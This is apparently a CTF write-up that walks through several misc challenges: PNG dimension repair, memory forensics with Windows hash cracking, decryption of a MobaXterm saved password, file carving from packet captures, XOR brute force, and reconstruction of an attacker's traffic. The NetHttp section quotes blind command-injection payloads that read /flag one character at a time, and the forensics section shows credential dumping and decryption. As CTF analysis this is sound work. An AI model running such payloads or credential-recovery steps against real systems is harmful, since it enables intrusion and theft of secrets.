Preface
Because these few days clashed with another competition, I did not play live, and after it ended the containers could no longer be started, so I did not do the web challenges. Here I only record a few misc challenges.
1. See anything in these pics?
Challenge description: TBH THERE ARE SO MANY PICS NOT ONLY JUST 2 PIC
The attachment unpacks into two files: an archive and an Aztec barcode. The archive needs a password to extract, so the guess is that the Aztec code holds the extraction password:
Trying: 5FIVE
Extract:
It extracts successfully and gives one image: YVL.jpg
There are only a handful of image steganography tricks; run foremost over it first:
That yields a black image. Again, image stego comes in only a few flavours; trying them one by one, the final guess was that the width/height had been modified. Run the script:
import zlib
import struct
import argparse
import itertools

parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True, help="00000149.png")
args = parser.parse_args()

bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29])  # CRC computed over the IHDR chunk type + data
original_crc32 = int(bin_data[29:33].hex(), 16)  # CRC stored in the file

if crc32key == original_crc32:  # compare the computed CRC with the stored one
    print('Width/height are fine!')
else:
    input_ = input("Width/height were modified; brute-force them via the CRC? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        exit()
    else:
        for i, j in itertools.product(range(4095), range(4095)):
            # In theory up to 0xFFFFFFFF, but given real screens and CPU time 0x0FFF is plenty, i.e. 4095 for width and height
            data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
            crc32 = zlib.crc32(data)
            if crc32 == original_crc32:
                # CRC for dimensions i:j matches the CRC in the file, so the real size is found
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"Width: {i}, hex: {hex(i)}")
                print(f"Height: {j}, hex: {hex(j)}")
                exit(0)
Sure enough. So open it in TweakPNG and fix it:
The width and height live in the IHDR header; double-click that row:
Change the width and height to (1440, 1800) respectively and save the image:
Out it comes: flag{opium_00pium}
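The same check and repair can be done without TweakPNG. The following is an added example, not code from the original post: it builds a tiny PNG in memory, tampers with the IHDR dimensions the way the challenge file was tampered with, detects the mismatch through the IHDR CRC, brute-forces the true dimensions within a bounded range, and rewrites the chunk with a correct CRC. The search bound MAX_DIM and the sample image are constructed for the demonstration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_DIM = 64  # constructed search bound for this demo; real files need a larger range


def make_png(width: int, height: int) -> bytes:
    """Build a minimal valid 8-bit grayscale PNG (constructed sample, not a challenge file)."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        body = ctype + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)

    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    # one filter byte (0 = none) followed by width pixels per scanline
    raw = b"".join(b"\x00" + bytes([(x * 37 + y * 11) & 0xFF for x in range(width)]) for y in range(height))
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def tamper_dimensions(png: bytes, width: int, height: int) -> bytes:
    """Overwrite IHDR width/height without fixing the CRC, mimicking the challenge file."""
    return png[:16] + struct.pack(">II", width, height) + png[24:]


def ihdr_crc_ok(png: bytes) -> bool:
    """True when the stored IHDR CRC matches the CRC over chunk type + data (bytes 12..29)."""
    stored = struct.unpack(">I", png[29:33])[0]
    return zlib.crc32(png[12:29]) & 0xFFFFFFFF == stored


def recover_dimensions(png: bytes, max_dim: int = MAX_DIM):
    """Brute-force the (width, height) whose IHDR CRC equals the stored one; None if not found."""
    stored = struct.unpack(">I", png[29:33])[0]
    tail = png[24:29]  # bit depth, colour type, compression, filter, interlace
    for w in range(1, max_dim + 1):
        for h in range(1, max_dim + 1):
            if zlib.crc32(b"IHDR" + struct.pack(">II", w, h) + tail) & 0xFFFFFFFF == stored:
                return w, h
    return None


def repair_ihdr(png: bytes, width: int, height: int) -> bytes:
    """Rewrite IHDR with the recovered dimensions and a freshly computed CRC (what TweakPNG does)."""
    body = b"IHDR" + struct.pack(">II", width, height) + png[24:29]
    return png[:12] + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF) + png[33:]


def demo():
    """Tamper a constructed 40x24 image, recover the real size, repair it, and report."""
    good = make_png(40, 24)
    bad = tamper_dimensions(good, 40, 12)  # hide half of the image by shrinking the height
    assert not ihdr_crc_ok(bad)
    dims = recover_dimensions(bad)
    fixed = repair_ihdr(bad, *dims)
    return dims, ihdr_crc_ok(fixed), fixed == good


if __name__ == "__main__":
    print(demo())  # ((40, 24), True, True)
```

The CRC covers only the chunk type and data, so any edit to the dimensions that leaves the original CRC in place is detectable; the brute force is only meaningful when the CRC was left untouched, which is exactly the situation in this challenge.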
2. ez_forensics
Challenge description: simple memory forensics
We are given an image file, so the first step is a file scan, which indeed turns up something:
python2 vol.py -f ezforensics.raw --profile=Win7SP1X64 filescan
0x000000003fd39dc0 16 0 RW-r-- \Device\HarddiskVolume2\Users\Flu0r1n3\Desktop\hint.txt
0x000000003eb51d00 16 0 -W---- \Device\HarddiskVolume2\Users\Flu0r1n3\Desktop\f14g.7z
0x000000003fa122e0 16 0 RW-r-- \Device\HarddiskVolume2\Users\Flu0r1n3\Desktop\f14g\mysecre
I thought dumping these files would finish the challenge, but I got stuck here for a long time. Dumping a file is actually easy, just use the offset, but no matter how I dumped it the result was empty. It turned out that only vol3 can dump them; everything dumped with vol2 came out as an empty file. The contents of the two files are these:
# mysecre
Besides the command line, where else can ssh be used?
# hint.txt
60 = ( ) + ( )
W@S Q9@S=5 RPW 92Q95S>N 7@P R96 N2QQU@P5 @7 R96 sXa
Nothing obvious from these, so on to the archive, which needs a password to extract. Let's go looking:
filescan    # file list already checked, nothing there
cmdline     # command history
clipboard   # clipboard
screenshot  # screenshots: IF_FloatingLangBar_WndTitle
pslist      # processes
iehistory   # browser history
notepad     # notepad contents
envars      # environment variables
verinfo     # version information
Checked everything worth checking and found nothing at all; the trail went cold here. Thinking it over again later: could it be the user's password?
python2 vol.py --plugin=volatility_plugin -f C:\Users\Administrator\Desktop\ezforensics.raw --profile=Win7SP1x64 hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Flu0r1n3:1000:aad3b435b51404eeaad3b435b51404ee:15245efa2af8a339c15ed8e658911844:::
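Before handing hashes to an online cracker, a quick offline audit of the dump is worth doing. The following is an added example, not code from the original post: it parses the hashdump lines above, computes NT hashes (MD4 over the UTF-16LE encoding of the password; MD4 is implemented inline because hashlib's md4 is unavailable on many OpenSSL 3 builds), flags accounts whose NT hash is the hash of the empty password, and checks a small wordlist. The wordlist is constructed for the demonstration and is an assumption, not the cmd5 database the post used.

```python
import struct

# The three hashdump lines from the post
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Flu0r1n3:1000:aad3b435b51404eeaad3b435b51404ee:15245efa2af8a339c15ed8e658911844:::
"""
# Constructed wordlist for the demo (the post cracked the real hash with cmd5)
WORDLIST = ["password", "Password1", "strawberries", "letmein"]

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320), inline because hashlib's md4 is disabled on many OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: words in order, no constant
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: column order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: order 0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex-encoded the way hashdump prints it."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Yield (user, rid, lm_hash, nt_hash) from pwdump-style lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4:
            yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def empty_password_accounts(text: str):
    """Accounts whose NT hash equals the hash of the empty password."""
    blank = nt_hash("")
    return [user for user, _, _, nt in parse_hashdump(text) if nt == blank]


def check_wordlist(nt: str, words):
    """Return the first wordlist entry whose NT hash matches, else None."""
    for w in words:
        if nt_hash(w) == nt.lower():
            return w
    return None


if __name__ == "__main__":
    print("blank passwords:", empty_password_accounts(HASHDUMP))
    for user, _, _, nt in parse_hashdump(HASHDUMP):
        print(user, check_wordlist(nt, [""] + WORDLIST))
```

The LM field aad3b435b51404eeaad3b435b51404ee on every line is the "no LM hash" marker rather than a real hash, which is why only the NT column matters here.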
Ran them through cmd5: the first two are empty passwords, and the third one cracked:
If it cracks, that is very likely the one. Extract the archive with it: strawberries
That yields two files:
# mysecret.txt
Besides the command line, where else can ssh be used?
# flag_is_here.ini
[Misc]
PasswordsInRegistry=0
SkinSat=80
SkinName3=Windows bright theme
LastSession=8.146.206.183 (root)|#109#0%8.146.206.183%22%root%%-1%-1%%%%%0%0%0%%%-1%0%0%0%%1080%%0%0%1%%0%%%%0%-1%-1%0#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%0%_Std_Colors_0_%80%24%0%1%-1%<none>%%0%0%-1%0%#0# #-1
SessionP=525710918580
MPSetDate=2024/9/14
MPSetAccount=lpp
MPSetComputer=DESKTOP-BTGC50A
WhenToPromptForMasterPassword=0
RightClickAction=0
RightClickAssigned=1
[WindowPos_DESKTOP-BTGC50A_2254_1356]
CompactMode=0
MonitorCount=1
Left=664
Top=413
Width=925
Height=530
Maximized=0
SidebarVisible=1
SidebarWidth=240
[SSH]
SFTPShowDotFiles=1
SFTPAsciiMode=0
MonitorHost=1
MonitorCPU=1
MonitorRAM=1
MonitorNetUp=1
MonitorNetDown=1
MonitorProcesses=0
MonitoFDs=0
MonitorUptime=1
MonitorUsers=1
MonitorPartitions=1
MonitorNfsPartitions=0
MonitorNetstat=0
StrictHostKeyChecking=0
[Display]
SidebarRight=0
C10Checked=1
C11Checked=1
C12Checked=1
C13Checked=0
C14Checked=0
VisibleTabNum=1
VisibleTabClose=1
MenuAndButtons=2
BtnType2=2
S3Checked=0
[Recently started]
16=
15=
14=
13=
12=
11=
10=
9=
8=
7=
6=
5=
4=
3=
2=
1=User sessions\8.146.206.183 (root)
[Bookmarks]
SubRep=
ImgNum=42
8.146.206.183 (root)=#109#0%8.146.206.183%22%root%%-1%-1%%%%%0%0%0%%%-1%0%0%0%%1080%%0%0%1%%0%%%%0%-1%-1%0#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%0%_Std_Colors_0_%80%24%0%1%-1%<none>%%0%0%-1%0%#0# #-1
[SSH_Hostkeys]
ssh-ed25519@22:8.146.206.183=0x6156055a6c8a67727b08f315e254102f6f532459048e4190b2c6dbb182ec8349,0x53d745b68017b99e3b283ce6fe535722f1b3be59297aa321acc009027ef8d8c6
sha256-ssh-ed25519@22:8.146.206.183=51:61:73:a8:2c:9d:06:62:1f:c8:a4:93:be:03:ae:79:43:2c:f0:a3:9c:3a:da:e1:cd:92:78:d0:73:3f:1c:3d
[BrowsersFoldersHistory]
SessionsList=ssh:[email protected]|
ssh:[email protected]=/root/|
[Passwords]
mobauser@mobaserver=W0nmIUoAHiS7Enz5knrBGIULkm7tzQkT
ssh22:[email protected]=DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL
[email protected]=DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL
[Sesspass]
lpp@DESKTOP-BTGC50A=AQAAAAtMPr5bFNBBgymNzfvqK1IAAAAAAgAAAAAAEGYAAAABAAAgAAAA9ciJP0h5btZporoTUuO+KSkZaXPyaFP0BIapWdBAtzIAAAAADoAAAAACAAAgAAAA3XiqLJcYkSKc4U53KEgUkLJ18XUZl839QJZSYWRNE7dgAAAAFvujlMf2YKFG+v4oWmg9/K7jcq4ramD+W3nkZ4Pb+c3xboscKEBHSJSjF4kEU1PWAem84pDNxBbiQ7khsErImifjFDrumtQbhiuy52rfNSXafA0i1VCkL/0m/GUqMg+1QAAAAH+cAI5triwt26T6cGMI4w6pZRWuiWtTYEl/9q9boN5Rhw5YYkSZ94gPm6u+MuG2iH5cKiqiKfV/aFLqmj7vseE=
LastUsername=lpp
LastComputername=DESKTOP-BTGC50A
[WindowPos_DESKTOP-BTGC50A_2258_1278]
CompactMode=0
MonitorCount=1
Left=666
Top=374
Width=925
Height=530
Maximized=0
SidebarVisible=1
SidebarWidth=240
[LastInstanceSessions]
0=
1=User sessions\8.146.206.183 (root)
test
I genuinely did not recognise this thing, but throwing it at an AI gave a lead:
It is a MobaXterm configuration file. Nowhere visible in the whole file is there a flag, so the flag is very likely inside the ciphertext.
Decrypt it with this tool:
https://github.com/HyperSine/how-does-MobaXterm-encrypt-password
python3 MobaXtermCipher.py dec -p flag_is_here DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL
# flag{eW91X2FyZV9hX2cwMGRfZ3V5}
# the argument after -p is the key, which is actually the file name; without it nothing decrypts and the challenge cannot be solved
# the trailing ciphertext is root's login password
Submitting this flag was rejected, oddly. Looking closer, it might be base64; decode it:
It really was base64. Was that necessary? The final flag is: flag{you_are_a_g00d_guy}
3. Simple image extraction
Challenge description: RR_studio
The attachment is a pcapng capture, so straight into Wireshark.
My habit when opening Wireshark is to filter for HTTP traffic first:
There is something there; follow the stream:
POST /uplaod/upload_file.php HTTP/1.1
Host: localhost:82
Connection: keep-alive
Content-Length: 9894
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
Origin: http://localhost:82
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDWjVWvgUnUwW8At
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:82/uplaod/form.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

------WebKitFormBoundaryoDWjVWvgUnUwW8At
Content-Disposition: form-data; name="file"; filename="please recovery.zip"
Content-Type: application/x-zip-compressed

PK.........xoQ?(...$..........disk-recovery.img.]..W.........."C....."8...Z.......V....P...*V..j.{......Q...].......2.i...}............B]Hqt..q.^......../. .p.D!..;.|.0..$.St..".S.._....yz...3/m....{@Np.s.sQ...!....u..,u.qIio.R..a. ....~.....:...H.....^..U?'^[email protected]".,b.&....m...Kp.........}.UR.oL.h..I...........[.h...,.nYV..v.......or.n.7..]?as.....}...].a{.qw`a?...9EG".u.=...{..K.1O
------WebKitFormBoundaryoDWjVWvgUnUwW8At
Content-Disposition: form-data; name="file"; filename="please recovery.zip"
Content-Type: application/x-zip-compressed

.....................................{p ...............................................................................6....................................................................@..............................................................*........ ..A............PK..?........xoQ?(...$........$....... .......disk-recovery.img. .........P~......T.U..<....T..<..PK..........c....$....
------WebKitFormBoundaryoDWjVWvgUnUwW8At
Content-Disposition: form-data; name="submit"

......
------WebKitFormBoundaryoDWjVWvgUnUwW8At--
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Thu, 29 Apr 2021 06:53:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4

9584
...............: please recovery.zip<br>
............: application/x-zip-compressed<br>
............: 9.359375 kB<br>
...........................: C:\Users\Go up\AppData\Local\Temp\php48E.tmp<br>
...............: upload/please recovery.zip
The middle part is omitted; in short, an archive named please recovery.zip was uploaded.
So carve this archive out with 010 Editor; extracting it gives: disk-recovery.img
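Instead of carving the ZIP by hand in a hex editor, the file part can be cut out of the multipart body programmatically. Below is an added example, not code from the original post: a small multipart/form-data parser that takes the raw request body plus the boundary from the Content-Type header, returns each part's headers and bytes, and checks the uploaded part for the ZIP local-file-header signature. The request body used here is constructed from the headers shown above, with a tiny fake ZIP payload in place of the real 9 kB archive.

```python
import re

# Constructed sample: the boundary from the captured request, but a tiny fake payload
# (PK\x03\x04 signature plus filler) instead of the real archive.
BOUNDARY = "----WebKitFormBoundaryoDWjVWvgUnUwW8At"
FAKE_ZIP = b"PK\x03\x04" + b"\x00" * 26 + b"disk-recovery.img" + b"\xde\xad\xbe\xef" * 4
SAMPLE_BODY = (
    b"--" + BOUNDARY.encode() + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="please recovery.zip"\r\n'
    b"Content-Type: application/x-zip-compressed\r\n\r\n" + FAKE_ZIP + b"\r\n"
    b"--" + BOUNDARY.encode() + b"\r\n"
    b'Content-Disposition: form-data; name="submit"\r\n\r\n'
    b"\xe4\xb8\x8a\xe4\xbc\xa0\r\n"
    b"--" + BOUNDARY.encode() + b"--\r\n"
)


def boundary_from_content_type(header_value: str) -> str:
    """Pull the boundary token out of a multipart/form-data Content-Type header."""
    m = re.search(r'boundary=("?)([^";]+)\1', header_value)
    if not m:
        raise ValueError("no boundary in Content-Type")
    return m.group(2)


def parse_multipart(body: bytes, boundary: str):
    """Split a multipart/form-data body into parts: a list of (headers dict, data bytes).

    Parts are delimited by '--' + boundary; the closing delimiter carries a trailing '--'.
    The CRLF that precedes each delimiter belongs to the delimiter, not to the part data.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:          # [0] is the preamble before the first boundary
        if chunk.startswith(b"--"):               # closing delimiter: nothing follows
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            if name:
                headers[name.strip().lower()] = value.strip()
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts


def filename_of(headers: dict):
    """Extract filename="..." from Content-Disposition, or None for plain form fields."""
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return m.group(1) if m else None


def extract_uploaded_files(body: bytes, content_type: str):
    """Return {filename: info} for every file part, noting whether it starts like a ZIP."""
    out = {}
    for headers, data in parse_multipart(body, boundary_from_content_type(content_type)):
        name = filename_of(headers)
        if name is not None:
            out[name] = {"size": len(data), "is_zip": data.startswith(b"PK\x03\x04"), "data": data}
    return out


if __name__ == "__main__":
    ct = "multipart/form-data; boundary=" + BOUNDARY
    for fname, info in extract_uploaded_files(SAMPLE_BODY, ct).items():
        print(fname, info["size"], "zip" if info["is_zip"] else "not zip")
```

On a real export from Wireshark ("Follow TCP Stream", saved as raw bytes) the same function applies to the request body after the blank line that ends the headers; the data returned for the file part can be written straight to disk as the ZIP.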
This is a corrupted image and its contents cannot be extracted directly. But the challenge hints at it in several places: the image has to be recovered.
The challenge title is itself a hint: R-STUDIO, a disk-recovery tool.
After opening the image in that tool, this file shows up: 销售报表.xls (sales report)
Open it and the flag is right there: flag{E7A10C15E26AA5750070EF756AAA1F7C}
4. Under pressure, write a script
Challenge description: brute force
We start with an archive: zip_100_1.zip
Extracting it gives:
zip_99.zip
password_99.txt -> RkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZH
Base64-decode that string:
FGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFG
Then it can be used to extract zip_99.zip.
After extracting there is again an archive plus a text file; the archive needs a password and the text file holds a base64 string.
So the approach is clear: 100 nested archives, each one's password sitting in the text file in the current directory, after one round of base64 decoding. No wonder the challenge asks for a script. Here it is:
import zipfile
import os
import base64
import re

# Path to the folder holding the archives
base_dir = r".\zip_dir"  # the folder where you put the archives
flag_file = os.path.join(base_dir, "flag.txt")  # flag.txt collects the passwords


# Recursively extract the archives
def extract_zip(zip_path, target_dir):
    try:
        # Get the zip file name
        zip_file_name = os.path.basename(zip_path)
        # Pull the number out of the archive name (assumed format zip_XX.zip)
        match = re.match(r"zip_(\d+)\.zip", zip_file_name)
        if match:
            # Build the password file name from the number
            zip_number = match.group(1)
            password_file = os.path.join(target_dir, f"password_{zip_number}.txt")
            # Print the password file path to help debugging
            print(f"password file: {password_file}")
            if os.path.exists(password_file):
                with open(password_file, 'r') as pf:
                    password_base64 = pf.read().strip()  # read the password and strip whitespace
                    # Base64-decode the password
                    password = base64.b64decode(password_base64)
                    # Append the password to flag.txt
                    with open(flag_file, 'a') as flag_f:
                        flag_f.write(f"{password_base64}")
                    print(f"password {zip_number} written to flag.txt")
            else:
                print(f"password file {password_file} does not exist!")
                return
        else:
            print(f"cannot extract a number from the file name: {zip_file_name}")
            return

        with zipfile.ZipFile(zip_path, 'r') as zip_ref:
            # Extract everything
            zip_ref.extractall(target_dir, pwd=password)
            print(f"extracted: {zip_path}")
            # Look for a nested zip
            for file in zip_ref.namelist():
                if file.endswith('.zip'):
                    nested_zip_path = os.path.join(target_dir, file)
                    print(f"found nested archive: {nested_zip_path}")
                    # Recurse into the nested archive
                    extract_zip(nested_zip_path, target_dir)
    except Exception as e:
        print(f"extraction failed: {zip_path}, error: {e}")


# Extract the outermost archive (e.g. zip_100.zip)
zip_file = "zip_99.zip"  # name of the outermost archive you want to extract
zip_path = os.path.join(base_dir, zip_file)

# Create the target folder
if not os.path.exists(base_dir):
    os.makedirs(base_dir)

# Create or empty flag.txt
if os.path.exists(flag_file):
    os.remove(flag_file)

# Start extracting
extract_zip(zip_path, base_dir)
When running it, note that your files must be laid out like this, otherwise it will not run:
After running we get zip_0.zip,
with the contents:
Judging by the hint, the idea seems to be to join all the passwords together?
Anyone who has done many CTFs will immediately notice the contents of password_0.txt:
It is clearly a PNG file header, so the approach is clear: concatenate the contents of password_0 through password_99. Script:
password = ''
for i in range(0, 100):
    with open(f'password_{i}.txt', 'r') as f:
        password += f.read()
print(password)
Base64-decode the output once more:
Drop the hex into 010 Editor and save it as a PNG file; this gives a QR code:
Scan it: flag{_PASSWORDs_is_fl@g!_}
5. Simple arithmetic
Challenge description: think XOR
We are given a strange string: ys~xdg/m@]mjkz@vl@z~lf>b
The challenge says think XOR but gives no key, so presumably brute force it; out comes CyberChef:
With key=1f1f it pops out: flag{x0r_Brute_is_easy!}
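The CyberChef brute force above is easy to reproduce in a few lines. The following is an added example rather than code from the original post: it tries every single-byte key against the challenge string, keeps only candidates whose output is entirely printable ASCII, and ranks them so that a flag-shaped result wins. The two-byte key 1f1f reported by CyberChef is the same byte repeated, which is why a single-byte search finds it.

```python
import string

CIPHERTEXT = b"ys~xdg/m@]mjkz@vl@z~lf>b"  # the string from the challenge
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")  # drop vertical tab / form feed


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; a single-byte key is the length-1 special case."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score(candidate: bytes) -> int:
    """Higher is better: -1 rejects non-printable output, flag-shaped output gets a large bonus."""
    if any(b not in PRINTABLE for b in candidate):
        return -1
    s = 0
    if candidate.startswith(b"flag{") and candidate.endswith(b"}"):
        s += 100
    s += sum(1 for b in candidate if chr(b) in string.ascii_letters)  # prefer mostly-alphabetic text
    return s


def brute_force_single_byte(data: bytes):
    """Try all 256 single-byte keys; return (key, plaintext) pairs sorted best first."""
    results = []
    for k in range(256):
        pt = xor_with_key(data, bytes([k]))
        sc = score(pt)
        if sc >= 0:
            results.append((sc, k, pt))
    results.sort(key=lambda t: (-t[0], t[1]))
    return [(k, pt) for _, k, pt in results]


def best_guess(data: bytes = CIPHERTEXT):
    """Top-ranked key (as an int) and its plaintext (as str)."""
    key, pt = brute_force_single_byte(data)[0]
    return key, pt.decode("ascii")


if __name__ == "__main__":
    for key, pt in brute_force_single_byte(CIPHERTEXT)[:5]:
        print(f"key=0x{key:02x}  {pt.decode('ascii')}")
```

Only one key can turn the leading 'y' (0x79) into 'f' (0x66), namely 0x79 ^ 0x66 = 0x1f, so the flag-prefix bonus singles it out; without a known prefix the printable-ratio ranking still puts the real plaintext near the top on a string this long.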
6. NetHttp
Challenge description: at one or two in the morning a private server on the company intranet was compromised, and the attacker left very obvious, provocative traces.
We are given a capture; straight into Wireshark, and as usual filter HTTP first:
One look shows it: template injection got in.
Having gone through the whole capture, the core is here:
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 26) == 'Z' ]; then echo "rce";fi
# cat /flag: read the contents of /flag.
# base64 -w 0: base64-encode the content; -w 0 disables line wrapping.
# awk NR==1: select the first line.
# cut -c 26: take the 26th character.
# if [ $(...) == 'Z' ]: compare the result of the pipeline with the character Z.
# then echo "rce": if the 26th character equals Z, print rce.
# fi: end of the if statement.
Roughly: read each character of the (base64-encoded) flag and compare it against a letter; if they match, print rce.
This one, for instance, succeeded:
So the filter expression follows: http contains "Welcome rce"
That gives 256 packets. Everything filtered this way is, by construction, a correctly guessed character, so export them all:
Open the export and pull out all the base64 strings; that is easy with one regex: echo%20(.*?)%20
Having extracted every correctly guessed base64 string, decode them:
Decoding shows that two files were read in total: /app/secret/mw/m5 and /flag. For solving the challenge we obviously go straight to the flag file:
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 1) == 'R' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 2) == 'm' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 3) == 'F' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 4) == 'r' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 5) == 'Z' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 6) == 'S' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 7) == 'B' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 8) == 'G' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 9) == 'T' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 10) == 'G' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 11) == 'F' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 12) == 'n' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 13) == 'C' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 14) == 'm' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 15) == '5' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 16) == 'v' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 17) == 'I' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 18) == 'G' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 19) == 'h' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 20) == 'l' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 21) == 'c' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 22) == 'm' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 23) == 'U' ]; then echo "rce";fi
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 24) == 'K' ]; then echo "rce";fi
Joined together that is: RmFrZSBGTGFnCm5vIGhlcmUK
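Reconstructing what a blind, one-character-at-a-time exfiltration leaked is a routine incident-response task, and it is easy to script against the exported requests. The following is an added example, not code from the original post: it takes request/response pairs in a constructed form (the URL-decoded command string plus the response body), keeps only the pairs whose response contains "Welcome rce", parses file path, character position and guessed character out of each command, reassembles the per-file base64 string and decodes it, reporting any positions that were never confirmed. The sample records reuse the 24 /flag probes above plus two constructed failed guesses.
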